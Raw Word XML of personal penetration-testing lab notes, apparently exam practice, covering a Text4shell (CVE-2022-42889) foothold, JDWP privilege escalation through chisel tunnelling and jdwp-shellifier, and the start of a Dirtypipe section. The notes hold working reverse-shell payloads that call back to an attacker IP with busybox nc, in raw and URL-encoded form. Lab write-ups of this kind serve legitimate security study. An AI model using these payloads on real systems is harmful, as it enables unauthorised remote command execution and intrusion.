    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038CA">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To search do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038CB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1212"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1237">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://192.168.117.150:8080/search?query=helloworld</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038CC">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And then I saw a CHANGELOG directory which outputted this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1212"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Changelog Version 0.2 - Added Apache Commons Text 1.8 Dependency for String Interpolation Version 0.1 - Initial beta version based on Spring Boot Framework - Added basic search functionality</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038CE">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I then searched up Apache Commons Text 1.8 and found the exploit Text4shell which is CVE-2022-42889</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038CF">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I found that we can get command execution as using this as the argument for the query:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="121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${script:javascript:java.lang.Runtime.getRuntime().exec('whoami')}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038D1">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But, I couldn't get nc, bash, or ping to work. So I looked at discord and we had to use this tool called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">busybox</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. BusyBox is basically a single lightweight binary that bundles tons of common Linux utilities into one file. This includes sh, ls, nc, and cat.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038D2">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So, we could use this to get a reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038D3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1212"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">busybox nc 192.168.45.232 4444 -e sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1212"/>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busybox nc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is how to use nc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1212"/>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-e sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> means "Execute /bin/sh and attach it to the socket"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1212"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-e</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag is part of nc, not busybox. Could have also done</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038D7">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I used this as my payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="121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${script:javascript:java.lang.Runtime.getRuntime().exec('busybox nc 192.168.45.232 4444 -e sh')}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038D9">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I then URL encoded it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1212"/>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%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27busybox%20nc%20192.168.45.232%204444%20-e%20sh%27%29%7D</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038DB">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I then set up listener on port 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1212"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwarp nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038DD">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I then put it into URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038DE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1212"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1238">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://192.168.117.150:8080/search?query=</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId1239">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27busybox%20nc%20192.168.45.232%204444%20-e%20sh%27%29%7D</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1212"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And I got back shell!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038E0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038E1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5bywjz4dln4g" w:id="531"/>
      <w:bookmarkEnd w:id="531"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">JDWP </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038E2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038E3">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Was seen in XXXXXXXXX-B .150 and used for priv esc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038E4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038E5">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Use pspy and see this line:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="678"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> java -Xdebug -Xrunjdwp:transport=dt_socket,address=8000,server=y /opt/stats/App.java</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="678"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> java -Xdebug -Xrunjdwp means that it's running JDWP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038E8">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Use this exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="678"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1240">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/IOActive/jdwp-shellifier</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038EA">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I tried running python3, but it has syntax errors so I tried python2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038EB">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We look at ports on victim, and 8000 and 5000 are two of them, both of which are related to JDWP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038EC">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I tried accessing both using Ligolo, but it didn't work. I think it's because I already have a ligolo thing set up for the connection to 10.10.xxx.0/24 subnet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038ED">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So I tried Chisel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038EE">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Run this on Kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="67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chisel server -p 8888 --reverse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038F0">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Run this on victim</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="67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./chisel client 192.168.45.232:8888 R:5000:127.0.0.1:5000 R:8000:127.0.0.1:8000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="678"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This port forwards both 5000 and 8000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038F3">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Then we run exploit. notice we had to use</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> busybox, just like in the foothold</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="67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python2 jdwp-shellifier.py -t 127.0.0.1 --cmd 'busybox nc 192.168.45.232 4444 -e /bin/bash'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038F5">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38F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="67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nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038F7">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And then we activate it by accessing port 5000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="67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nc 127.0.0.1 5000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="678"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Turns out 5000 was actually not only listening on internal 127.0.0.1, so you actually didn't need to port forward 5000, and could just activate it by using</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> nc 192.168.xxx.150 5000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="678"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And we get shell back!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038FB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038FC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dzpfhv5ja90" w:id="532"/>
      <w:bookmarkEnd w:id="532"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038FD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_x0r4i6635hcj" w:id="533"/>
      <w:bookmarkEnd w:id="533"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dirtypipe (CVE-2022-0847)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038FE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038FF">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerable: 5.8 → 5.16.10 (inclusive), 5.15 → 5.15.24, 5.10 → 5.10.101</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003900">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003901">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From XXXXXXXXX-B .149</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003902">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="760"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Priv Esc (via Dirtypipe)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003903">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="760"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
